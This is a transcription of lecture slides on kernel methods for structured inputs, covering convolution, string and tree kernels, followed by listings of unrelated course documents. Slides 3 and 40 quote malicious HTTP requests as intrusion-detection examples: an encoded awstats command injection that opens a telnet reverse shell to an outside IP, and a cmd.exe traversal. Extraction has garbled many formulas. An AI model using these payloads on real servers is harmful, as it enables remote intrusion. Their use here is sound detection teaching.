Lecture 9 Kernel Methods for Structured Inputs
|
|
- Warren Cameron
- 5 years ago
- Views:
Transcription
1 Lecture 9 Kernel Methods for Structured Inputs Pavel Laskov 1 Blaine Nelson 1 1 Cognitive Systems Group Wilhelm Schickard Institute for Computer Science Universität Tübingen, Germany Advanced Topics in Machine Learning, 2012 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
2 What We Have Learned So Far r c Learning problems are defined in terms of kernel functions reflecting the geometry of training data. What if the data does not naturally belong to inner product spaces? P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
3 Example: Intrusion Detection > GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aaccept-language: en\x0d \x0aaccept-encoding: gzip, deflate\x0d\x0acookie: POPUPCHECK= \x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/ \x0d \x0aconnection: keep-alive\x0d\x0ahost: \x0d\x0a > GET /cgi-bin/awstats.pl?configdir= echo;echo%20yyy;sleep%207200%7ct elnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh% 20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e 219%204321;echo%20YYY;echo HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d \x0ahost: wuppi.dyndns.org:80\x0d\x0aconnection: Close\x0d\x0a \x0d\x0a > GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a Accept-Language: en\x0d\x0aaccept-encoding: gzip, deflate\x0d\x0a Cookie:.ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy0 3YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/ : 27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like G ecko) Safari/ \x0d\x0aConnection: keep-alive\x0d\x0ahost : P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
4 Examples of Structured Input Data Histograms Strings Trees Graphs 2. N 1. NP S 3. VP V NP 2. N 1. NP S 3. VP V NP Jeff D ate N John hit D A N the apple the red car P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
5 Convolution Kernels in a Nutshell Decompose structured objects into comparable parts. Aggregate the values of similarity measures for individual parts. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
6 R-Convolution Let X be a set of composite objects (e.g., cars), and X 1,..., X D be sets of parts (e.g., wheels, brakes, etc.). All sets are assumed countable. Let R denote the relation being part of : R( x 1,..., x D,x) = 1, iff x 1,..., x D are parts of x The inverse relation R 1 is defined as: R 1 (x) = { x : R( x,x) = 1} In other words, for each object x, R 1 (x) is a set of component subsets, that are part of x. We say that R is finite, if R 1 is finite for all x X. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
7 R-Convolution: A Naive Example P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
8 R-Convolution: A Naive Example Alfa Romeo Junior Lada Niva wheels headlights bumpers transmission differential tow coupling... P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
9 R-Convolution: Further Examples Let x be a D-tuple in X = X 1... X D. Let each of the D components of x X be a part of x. Then R( x,x) = 1 iff x = x. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
10 R-Convolution: Further Examples Let x be a D-tuple in X = X 1... X D. Let each of the D components of x X be a part of x. Then R( x,x) = 1 iff x = x. Let X 1 = X 2 = X be sets of all finite strings over a finite alphabet. Define R( x 1, x 2,x) = 1 iff x = x 1 x 2, i.e. concatenation of x 1 and x 2. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
11 R-Convolution: Further Examples Let x be a D-tuple in X = X 1... X D. Let each of the D components of x X be a part of x. Then R( x,x) = 1 iff x = x. Let X 1 = X 2 = X be sets of all finite strings over a finite alphabet. Define R( x 1, x 2,x) = 1 iff x = x 1 x 2, i.e. concatenation of x 1 and x 2. Let X 1 =... = X D = X be a set of D-degree ordered and rooted trees. Define R( x,x) = 1 iff x 1,..., x D are D subtrees of the root of x X. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
12 R-Convolution Kernel Definition Let x,y X and x and ȳ be the corresponding sets of parts. Let K d ( x d,ȳ d ) be a kernel between the d-th parts of x and y (1 d D). Then the convolution kernel between x and y is defined as: K(x,y) = x R 1 (x) ȳ R 1 (y) D K d (x d,y d ) d=1 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
13 Examples of R-Convolution Kernels RBF kernel is a convolution kernel. Let each of the D dimensions of x be a part, and K d (x d,y d ) = e (x d y d ) 2 /2σ 2. Then K(x,y) = D d=1 e (x d y d ) 2 /2σ 2 = e D d=1 (x d y d ) 2 /2σ 2 = e x y 2 2σ 2 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
14 Examples of R-Convolution Kernels RBF kernel is a convolution kernel. Let each of the D dimensions of x be a part, and K d (x d,y d ) = e (x d y d ) 2 /2σ 2. Then K(x,y) = D d=1 e (x d y d ) 2 /2σ 2 = e D d=1 (x d y d ) 2 /2σ 2 = e x y 2 2σ 2 Linear kernel K(x,y) = D d=1 x dy d is not a convolution kernel, except for the trivial single part decomposition. For any other decomposition, we would need to sum products of more than one term, which contradicts the formula for the linear kernel. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
15 Subset Product Kernel Theorem Let K be a kernel on a set U U. The for all finite, non-empty subsets A,B U, K (A,B) = K(x,y) x Ay B is a valid kernel. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
16 Subset Product Kernel Proof. Goal: show that K (A,B) is an inner product in some space... Recall that for any point u U, K(u, ) is a function K u in some RKHS H. Let f A = u A K u, f B = u B K u. Define f A,f B := x A K(x,y) y B We need to show that it satisfies properties of an inner product... Let f C = u C K u. Clearly, f A +f C,f B = x A C = y BK(x,y) y BK(x,y)+ x A x C Other properties of the inner product can be proved similarly. K(x,y) y B P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
17 Back to the R-Convolution Kernel Theorem K(x,y) = is a valid kernel. x R 1 (x) ȳ R 1 (y) D K d (x d,y d ) d=1 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
18 Back to the R-Convolution Kernel Proof. Let U = X 1... X D. From the closure of kernels under the tensor product, it follows that K( x,ȳ) = D K d (x d,y d ) d=1 is a kernel on U U. Applying the Subset Product Kernel Theorem for A = R 1 (x), B = R 1 (y), the theorem s claim follows. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
19 End of Theory P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
20 Convolution Kernels for Strings Let x,y A be two strings generated from the alphabet A. How can we define K(x,y) using the ideas of convolution kernels? P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
21 Convolution Kernels for Strings Let x,y A be two strings generated from the alphabet A. How can we define K(x,y) using the ideas of convolution kernels? Let D = 1, take X 1 to be the set of all possible strings of length n ( n-grams ) generated from the alphabet A. X 1 = A n. For any x A and any x X 1, define R( x,x) = 1 iff x x. Then R 1 (x) is a set of all n-grams contained in x. Define K( x,ȳ) = 1 [ x=ȳ]. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
22 Convolution Kernels for Strings Let x,y A be two strings generated from the alphabet A. How can we define K(x,y) using the ideas of convolution kernels? Let D = 1, take X 1 to be the set of all possible strings of length n ( n-grams ) generated from the alphabet A. X 1 = A n. For any x A and any x X 1, define R( x,x) = 1 iff x x. Then R 1 (x) is a set of all n-grams contained in x. Define K( x,ȳ) = 1 [ x=ȳ]. K(x,y) = x R 1 (x) ȳ R 1 (y) 1 [ x=ȳ] P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
23 Convolution Kernels for Strings (ctd.) An alternative definition of a kernel for two strings can be obtained as follows: Let D = 1, take X 1 to be the set of all possible strings of arbitrary length generated from the alphabet A. X 1 =. For any x A and any x X 1, define R( x,x) = 1 iff x x. Then R 1 (x) is a set of all n-grams contained in x. Define K( x,ȳ) = 1 [ x=ȳ]. K(x,y) = x R 1 (x) ȳ R 1 (y) 1 [ x=ȳ] Notice that the size of the summation remains finite despite the infinite dimensionality of X 1. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
24 Geometry of String Kernels Sequences 1. blabla blubla blablabu aa 2. bla blablaa bulab bb abla 3. a blabla blabla ablub bla 4. blab blab abba blabla blu Subsequences Histograms of subsequences Geometry 2 3 Features b a bb aa bla blu abba abla blab ablub bulab blabla blablu blablaa blablabu 1 4 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
25 Metric Embedding of Strings Define the language S A of possible features, e.g., n-grams, words, all subsequences. For each sequence x, count occurrences of each feature in it: φ : x (φ s (x)) s S Use φ s (x) as the s-th coordinate of x in the vector space of dimensionality S. Define K(x,y) := φ s (x),φ s (y). This is equivalent to K(x,y) defined by the convolution kernel! P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
26 Similarity Measure for Embedded Strings Metric embedding enables application of various vectorial similarity measures over sequences, e.g. Kernels K(x,y) Linear φ s (x)φ s (y) s S RBF exp(d(x,y) 2 /σ) Similarity coefficients Jaccard, Kulczynski,... Distances d(x, y) Manhattan φ s (x) φ s (y) s S k Minkowski φ s (x) φ s (y) k Hamming s S sgn φ s (x) φ s (y) s S Chebyshev max s S φ s(x) φ s (y) P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
27 Embedding example X = abrakadabra Y = barakobama P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
28 Embedding example X = abrakadabra Y = barakobama X Y X Y a/5 a/4 20 b/2 b/2 4 d/1 k/1 k/1 1 m/1 o/1 r/2 r/ XY = 21.5 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
29 Embedding example X = abrakadabra Y = barakobama X Y X Y a/5 a/4 20 b/2 b/2 4 d/1 k/1 k/1 1 m/1 o/1 r/2 r/ XY = 21.5 X Y X Y ab/2 ad/1 ak/1 ak/1 1 am/1 ar/1 ba/2 br/2 da/1 ka/1 ko/1 ma/1 ob/1 ra/2 ra/ XY = 77.5 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
30 Implementation of String Kernels General observations Embedding space has huge dimensionality but is very sparse; at most linear number of entries are different from zero in each sample. Computation of similarity measures requires operations on either the intersection or the union of the set of non-zero features in each sample. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
31 Implementation of String Kernels General observations Embedding space has huge dimensionality but is very sparse; at most linear number of entries are different from zero in each sample. Computation of similarity measures requires operations on either the intersection or the union of the set of non-zero features in each sample. Implementation strategies Explicit but sparse representation of feature vectors sorted arrays or hash tables Implicit and general representations tries, suffix trees, suffix arrays P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
32 String Kernels using Sorted Arrays Store all features in sorted arrays Traverse feature arrays of two samples to find mathing elements φ(x) aa (3) ab (2) bc (2) cc (1) φ(z) ab (3) ba (2) bb (1) bc (4) Running time: Sorting: O(n) Comparison: O(n) P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
33 String Kernels using Generalized Suffix Trees 2-grams abbaa baaaa aa ab ba bb abbaa baaaa = a # $ b a # $ bbaa# aa baa# a # $ aa$ # a$ $ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
34 String Kernels using Generalized Suffix Trees 2-grams abbaa baaaa aa 1 3 ab ba bb abbaa baaaa = a # $ b a # $ bbaa# aa baa# a # $ aa$ # a$ $ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
35 String Kernels using Generalized Suffix Trees 2-grams abbaa baaaa aa 1 3 ab 1 0 ba bb abbaa baaaa = a # $ b a # $ bbaa# aa baa# a # $ aa$ # a$ $ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
36 String Kernels using Generalized Suffix Trees 2-grams abbaa baaaa aa 1 3 ab 1 0 ba 1 1 bb abbaa baaaa = a # $ b a # $ bbaa# aa baa# a # $ aa$ # a$ $ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
37 String Kernels using Generalized Suffix Trees 2-grams abbaa baaaa aa 1 3 ab 1 0 ba 1 1 bb 1 0 abbaa baaaa = a # $ b a # $ bbaa# aa baa# a # $ aa$ # a$ $ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
38 Tree Kernels: Motivation Trees are ubiquitous representations in various applications: Parsing: parse trees Content representation: XML, DOM Bioinformatics: philogeny Ad-hoc features related to trees, e.g. number of nodes or edges, are not informative for learning Structural properties of trees, on the other hand, may be very discriminative P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
39 Example: Normal HTTP Request GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<nl> Referer: Connection: keep-alive<nl> <httpsession> <request> <method> <uri> <version> <reqhdr> GET <path> HTTP/1.1 /test.gif <hdr> 1 <hdr> 2 <hdr> 3 <hdrkey> <hdrval> <hdrkey> <hdrval> <hdrkey> <hdrval> Accept: */* Referer: Connection: keep-alive P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
40 Example: Malicious HTTP Request GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0 <httpsession> <request> <method> <uri> <version> GET <path> <getparamlist> HTTP/1.0 /scripts/..%%35c../.../cmd.exe? <getparam> <getkey> /c+dir+c:\ P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
41 Convolution Kernels for Trees Similar to strings, we can define kernels for trees using the convolution kernel framework: Let D = 1, X 1 = X be sets of all trees. X 1 = X =. For any x X and any x X 1, define R( x,x) = 1 iff x x x is a subtree of x Then R 1 (x) is a set of all subtrees contained in x. Define K( x,ȳ) = 1 [ x=ȳ]. K(x,y) = x R 1 (x) ȳ R 1 (y) 1 [ x=ȳ] P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
42 Convolution Kernels for Trees Similar to strings, we can define kernels for trees using the convolution kernel framework: Let D = 1, X 1 = X be sets of all trees. X 1 = X =. For any x X and any x X 1, define R( x,x) = 1 iff x x x is a subtree of x Then R 1 (x) is a set of all subtrees contained in x. Define K( x,ȳ) = 1 [ x=ȳ]. K(x,y) = x R 1 (x) ȳ R 1 (y) 1 [ x=ȳ] Problem: Testing for equality between two trees may be extremely costly! P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
43 Recursive Computation of Tree Kernels Two useful facts: Transitivity of a subtree relationship: x ˆx &ˆx x x x Necessary condition for equality: two trees are equal only if all of their subtrees are equal. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
44 Recursive Computation of Tree Kernels Two useful facts: Transitivity of a subtree relationship: x ˆx &ˆx x x x Necessary condition for equality: two trees are equal only if all of their subtrees are equal. Recursive scheme Let Ch( x) denote the set of immediate children of the root of (sub)tree x. x := Ch( x). If Ch( x) Ch(ȳ) return 0. If x = ȳ, return 1. Otherwise return x K( x,ȳ) = (1+K( x i,ȳ i )) i=1 P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
45 Computation of Recursive Clause Find a pair of nodes with identical subsets of children. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
46 Computation of Recursive Clause Find a pair of nodes with identical subsets of children. Add one for the nodes themselves (subtrees of cardinality 1). P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
47 Computation of Recursive Clause Find a pair of nodes with identical subsets of children. Add one for the nodes themselves (subtrees of cardinality 1). Add counts for all mathing subtrees. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
48 Computation of Recursive Clause Find a pair of nodes with identical subsets of children. Add one for the nodes themselves (subtrees of cardinality 1). Add counts for all mathing subtrees. Multiply together and return the total count. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
49 Summary Kernels for structured data extend learning methods to a vast variety of practical data types. A generic framework for handling structured data is offered by convolution kernels. Special data structures and algorithms are needed for efficiency. Extensive range of applications: natural language processing bioinformatics computer security P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
50 Bibliography I [1] M. Collins and N. Duffy. Convolution kernel for natural language. In Advances in Neural Information Proccessing Systems (NIPS), volume 16, pages , [2] D. Haussler. Convolution kernels on discrete structures. Technical Report UCSC-CRL-99-10, UC Santa Cruz, July [3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for sequential data. Journal of Machine Learning Research, 9:23 48, P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
Intrusion Detection and Malware Analysis
Intrusion Detection and Malware Analysis IDS feature extraction Pavel Laskov Wilhelm Schickard Institute for Computer Science Metric embedding of byte sequences Sequences 1. blabla blubla blablabu aa 2.
More informationLinear Classifiers (Kernels)
Universität Potsdam Institut für Informatik Lehrstuhl Linear Classifiers (Kernels) Blaine Nelson, Christoph Sawade, Tobias Scheffer Exam Dates & Course Conclusion There are 2 Exam dates: Feb 20 th March
More informationChapter 6. Properties of Regular Languages
Chapter 6 Properties of Regular Languages Regular Sets and Languages Claim(1). The family of languages accepted by FSAs consists of precisely the regular sets over a given alphabet. Every regular set is
More information6.8 The Post Correspondence Problem
6.8. THE POST CORRESPONDENCE PROBLEM 423 6.8 The Post Correspondence Problem The Post correspondence problem (due to Emil Post) is another undecidable problem that turns out to be a very helpful tool for
More informationLecture 5 Supspace Tranformations Eigendecompositions, kernel PCA and CCA
Lecture 5 Supspace Tranformations Eigendecompositions, kernel PCA and CCA Pavel Laskov 1 Blaine Nelson 1 1 Cognitive Systems Group Wilhelm Schickard Institute for Computer Science Universität Tübingen,
More informationThis lecture covers Chapter 7 of HMU: Properties of CFLs
This lecture covers Chapter 7 of HMU: Properties of CFLs Chomsky Normal Form Pumping Lemma for CFs Closure Properties of CFLs Decision Properties of CFLs Additional Reading: Chapter 7 of HMU. Chomsky Normal
More informationT (s, xa) = T (T (s, x), a). The language recognized by M, denoted L(M), is the set of strings accepted by M. That is,
Recall A deterministic finite automaton is a five-tuple where S is a finite set of states, M = (S, Σ, T, s 0, F ) Σ is an alphabet the input alphabet, T : S Σ S is the transition function, s 0 S is the
More informationSupport Vector Machines
Support Vector Machines Reading: Ben-Hur & Weston, A User s Guide to Support Vector Machines (linked from class web page) Notation Assume a binary classification problem. Instances are represented by vector
More informationFormal Languages, Automata and Models of Computation
CDT314 FABER Formal Languages, Automata and Models of Computation Lecture 5 School of Innovation, Design and Engineering Mälardalen University 2011 1 Content - More Properties of Regular Languages (RL)
More informationSupport Vector Machines.
Support Vector Machines www.cs.wisc.edu/~dpage 1 Goals for the lecture you should understand the following concepts the margin slack variables the linear support vector machine nonlinear SVMs the kernel
More informationA Universal Turing Machine
A Universal Turing Machine A limitation of Turing Machines: Turing Machines are hardwired they execute only one program Real Computers are re-programmable Solution: Universal Turing Machine Attributes:
More informationFinite Automata Theory and Formal Languages TMV027/DIT321 LP4 2018
Finite Automata Theory and Formal Languages TMV027/DIT321 LP4 2018 Lecture 14 Ana Bove May 14th 2018 Recap: Context-free Grammars Simplification of grammars: Elimination of ǫ-productions; Elimination of
More informationFinite Automata Theory and Formal Languages TMV027/DIT321 LP4 2018
Finite Automata Theory and Formal Languages TMV027/DIT321 LP4 2018 Lecture 4 Ana Bove March 23rd 2018 Recap: Formal Proofs How formal should a proof be? Depends on its purpose...... but should be convincing......
More informationIn English, there are at least three different types of entities: letters, words, sentences.
Chapter 2 Languages 2.1 Introduction In English, there are at least three different types of entities: letters, words, sentences. letters are from a finite alphabet { a, b, c,..., z } words are made up
More informationNotes for Comp 497 (454) Week 10
Notes for Comp 497 (454) Week 10 Today we look at the last two chapters in Part II. Cohen presents some results concerning the two categories of language we have seen so far: Regular languages (RL). Context-free
More informationFast String Kernels. Alexander J. Smola Machine Learning Group, RSISE The Australian National University Canberra, ACT 0200
Fast String Kernels Alexander J. Smola Machine Learning Group, RSISE The Australian National University Canberra, ACT 0200 Alex.Smola@anu.edu.au joint work with S.V.N. Vishwanathan Slides (soon) available
More informationNon-context-Free Languages. CS215, Lecture 5 c
Non-context-Free Languages CS215, Lecture 5 c 2007 1 The Pumping Lemma Theorem. (Pumping Lemma) Let be context-free. There exists a positive integer divided into five pieces, Proof for for each, and..
More information1 Alphabets and Languages
1 Alphabets and Languages Look at handout 1 (inference rules for sets) and use the rules on some examples like {a} {{a}} {a} {a, b}, {a} {{a}}, {a} {{a}}, {a} {a, b}, a {{a}}, a {a, b}, a {{a}}, a {a,
More informationBASIC MATHEMATICAL TECHNIQUES
CHAPTER 1 ASIC MATHEMATICAL TECHNIQUES 1.1 Introduction To understand automata theory, one must have a strong foundation about discrete mathematics. Discrete mathematics is a branch of mathematics dealing
More informationFinite Automata Theory and Formal Languages TMV027/DIT321 LP4 2017
Finite Automata Theory and Formal Languages TMV027/DIT321 LP4 2017 Lecture 4 Ana Bove March 24th 2017 Structural induction; Concepts of automata theory. Overview of today s lecture: Recap: Formal Proofs
More informationTheory of Computation
Theory of Computation Lecture #2 Sarmad Abbasi Virtual University Sarmad Abbasi (Virtual University) Theory of Computation 1 / 1 Lecture 2: Overview Recall some basic definitions from Automata Theory.
More informationSection Summary. Relations and Functions Properties of Relations. Combining Relations
Chapter 9 Chapter Summary Relations and Their Properties n-ary Relations and Their Applications (not currently included in overheads) Representing Relations Closures of Relations (not currently included
More informationMA/CSSE 474 Theory of Computation
MA/CSSE 474 Theory of Computation Bottom-up parsing Pumping Theorem for CFLs Recap: Going One Way Lemma: Each context-free language is accepted by some PDA. Proof (by construction): The idea: Let the stack
More informationHarvard CS121 and CSCI E-121 Lecture 2: Mathematical Preliminaries
Harvard CS121 and CSCI E-121 Lecture 2: Mathematical Preliminaries Harry Lewis September 5, 2013 Reading: Sipser, Chapter 0 Sets Sets are defined by their members A = B means that for every x, x A iff
More informationSorting suffixes of two-pattern strings
Sorting suffixes of two-pattern strings Frantisek Franek W. F. Smyth Algorithms Research Group Department of Computing & Software McMaster University Hamilton, Ontario Canada L8S 4L7 April 19, 2004 Abstract
More informationComputational Models Lecture 8 1
Computational Models Lecture 8 1 Handout Mode Ronitt Rubinfeld and Iftach Haitner. Tel Aviv University. May 11/13, 2015 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice
More informationNotes for Comp 497 (Comp 454) Week 10 4/5/05
Notes for Comp 497 (Comp 454) Week 10 4/5/05 Today look at the last two chapters in Part II. Cohen presents some results concerning context-free languages (CFL) and regular languages (RL) also some decidability
More informationCountable and uncountable sets. Matrices.
Lecture 11 Countable and uncountable sets. Matrices. Instructor: Kangil Kim (CSE) E-mail: kikim01@konkuk.ac.kr Tel. : 02-450-3493 Room : New Milenium Bldg. 1103 Lab : New Engineering Bldg. 1202 Next topic:
More informationProperties of Context-Free Languages
Properties of Context-Free Languages Seungjin Choi Department of Computer Science and Engineering Pohang University of Science and Technology 77 Cheongam-ro, Nam-gu, Pohang 37673, Korea seungjin@postech.ac.kr
More informationcse303 ELEMENTS OF THE THEORY OF COMPUTATION Professor Anita Wasilewska
cse303 ELEMENTS OF THE THEORY OF COMPUTATION Professor Anita Wasilewska LECTURE 14 SMALL REVIEW FOR FINAL SOME Y/N QUESTIONS Q1 Given Σ =, there is L over Σ Yes: = {e} and L = {e} Σ Q2 There are uncountably
More informationThe View Over The Horizon
The View Over The Horizon enumerable decidable context free regular Context-Free Grammars An example of a context free grammar, G 1 : A 0A1 A B B # Terminology: Each line is a substitution rule or production.
More informationCS5371 Theory of Computation. Lecture 9: Automata Theory VII (Pumping Lemma, Non-CFL)
CS5371 Theory of Computation Lecture 9: Automata Theory VII (Pumping Lemma, Non-CFL) Objectives Introduce Pumping Lemma for CFL Apply Pumping Lemma to show that some languages are non-cfl Pumping Lemma
More informationComputational Models Lecture 8 1
Computational Models Lecture 8 1 Handout Mode Ronitt Rubinfeld and Iftach Haitner. Tel Aviv University. April 18/ May 2, 2016 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice
More informationComputational Models Lecture 8 1
Computational Models Lecture 8 1 Handout Mode Nachum Dershowitz & Yishay Mansour. Tel Aviv University. May 17 22, 2017 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice
More informationOpenFst: An Open-Source, Weighted Finite-State Transducer Library and its Applications to Speech and Language. Part I. Theory and Algorithms
OpenFst: An Open-Source, Weighted Finite-State Transducer Library and its Applications to Speech and Language Part I. Theory and Algorithms Overview. Preliminaries Semirings Weighted Automata and Transducers.
More informationBOUNDS ON ZIMIN WORD AVOIDANCE
BOUNDS ON ZIMIN WORD AVOIDANCE JOSHUA COOPER* AND DANNY RORABAUGH* Abstract. How long can a word be that avoids the unavoidable? Word W encounters word V provided there is a homomorphism φ defined by mapping
More informationComputational Models - Lecture 4
Computational Models - Lecture 4 Regular languages: The Myhill-Nerode Theorem Context-free Grammars Chomsky Normal Form Pumping Lemma for context free languages Non context-free languages: Examples Push
More informationFinite State Transducers
Finite State Transducers Eric Gribkoff May 29, 2013 Original Slides by Thomas Hanneforth (Universitat Potsdam) Outline 1 Definition of Finite State Transducer 2 Examples of FSTs 3 Definition of Regular
More informationKernel Methods. Konstantin Tretyakov MTAT Machine Learning
Kernel Methods Konstantin Tretyakov (kt@ut.ee) MTAT.03.227 Machine Learning So far Supervised machine learning Linear models Non-linear models Unsupervised machine learning Generic scaffolding So far Supervised
More informationThe Post Correspondence Problem; Applications to Undecidability Results
Chapter 8 The Post Correspondence Problem; Applications to Undecidability Results 8.1 The Post Correspondence Problem The Post correspondence problem (due to Emil Post) is another undecidable problem that
More informationBüchi Automata and their closure properties. - Ajith S and Ankit Kumar
Büchi Automata and their closure properties - Ajith S and Ankit Kumar Motivation Conventional programs accept input, compute, output result, then terminate Reactive program : not expected to terminate
More informationKernel Methods. Konstantin Tretyakov MTAT Machine Learning
Kernel Methods Konstantin Tretyakov (kt@ut.ee) MTAT.03.227 Machine Learning So far Supervised machine learning Linear models Least squares regression, SVR Fisher s discriminant, Perceptron, Logistic model,
More informationCPSC 421: Tutorial #1
CPSC 421: Tutorial #1 October 14, 2016 Set Theory. 1. Let A be an arbitrary set, and let B = {x A : x / x}. That is, B contains all sets in A that do not contain themselves: For all y, ( ) y B if and only
More informationMathematical Preliminaries. Sipser pages 1-28
Mathematical Preliminaries Sipser pages 1-28 Mathematical Preliminaries This course is about the fundamental capabilities and limitations of computers. It has 3 parts 1. Automata Models of computation
More informationEECS 229A Spring 2007 * * (a) By stationarity and the chain rule for entropy, we have
EECS 229A Spring 2007 * * Solutions to Homework 3 1. Problem 4.11 on pg. 93 of the text. Stationary processes (a) By stationarity and the chain rule for entropy, we have H(X 0 ) + H(X n X 0 ) = H(X 0,
More informationParsing. Context-Free Grammars (CFG) Laura Kallmeyer. Winter 2017/18. Heinrich-Heine-Universität Düsseldorf 1 / 26
Parsing Context-Free Grammars (CFG) Laura Kallmeyer Heinrich-Heine-Universität Düsseldorf Winter 2017/18 1 / 26 Table of contents 1 Context-Free Grammars 2 Simplifying CFGs Removing useless symbols Eliminating
More informationChapter 4: Computation tree logic
INFOF412 Formal verification of computer systems Chapter 4: Computation tree logic Mickael Randour Formal Methods and Verification group Computer Science Department, ULB March 2017 1 CTL: a specification
More informationNote: In any grammar here, the meaning and usage of P (productions) is equivalent to R (rules).
Note: In any grammar here, the meaning and usage of P (productions) is equivalent to R (rules). 1a) G = ({R, S, T}, {0,1}, P, S) where P is: S R0R R R0R1R R1R0R T T 0T ε (S generates the first 0. R generates
More informationDefinition: A binary relation R from a set A to a set B is a subset R A B. Example:
Chapter 9 1 Binary Relations Definition: A binary relation R from a set A to a set B is a subset R A B. Example: Let A = {0,1,2} and B = {a,b} {(0, a), (0, b), (1,a), (2, b)} is a relation from A to B.
More informationP is the class of problems for which there are algorithms that solve the problem in time O(n k ) for some constant k.
Complexity Theory Problems are divided into complexity classes. Informally: So far in this course, almost all algorithms had polynomial running time, i.e., on inputs of size n, worst-case running time
More informationProbabilistic Aspects of Computer Science: Probabilistic Automata
Probabilistic Aspects of Computer Science: Probabilistic Automata Serge Haddad LSV, ENS Paris-Saclay & CNRS & Inria M Jacques Herbrand Presentation 2 Properties of Stochastic Languages 3 Decidability Results
More informationEconomics 204 Fall 2012 Problem Set 3 Suggested Solutions
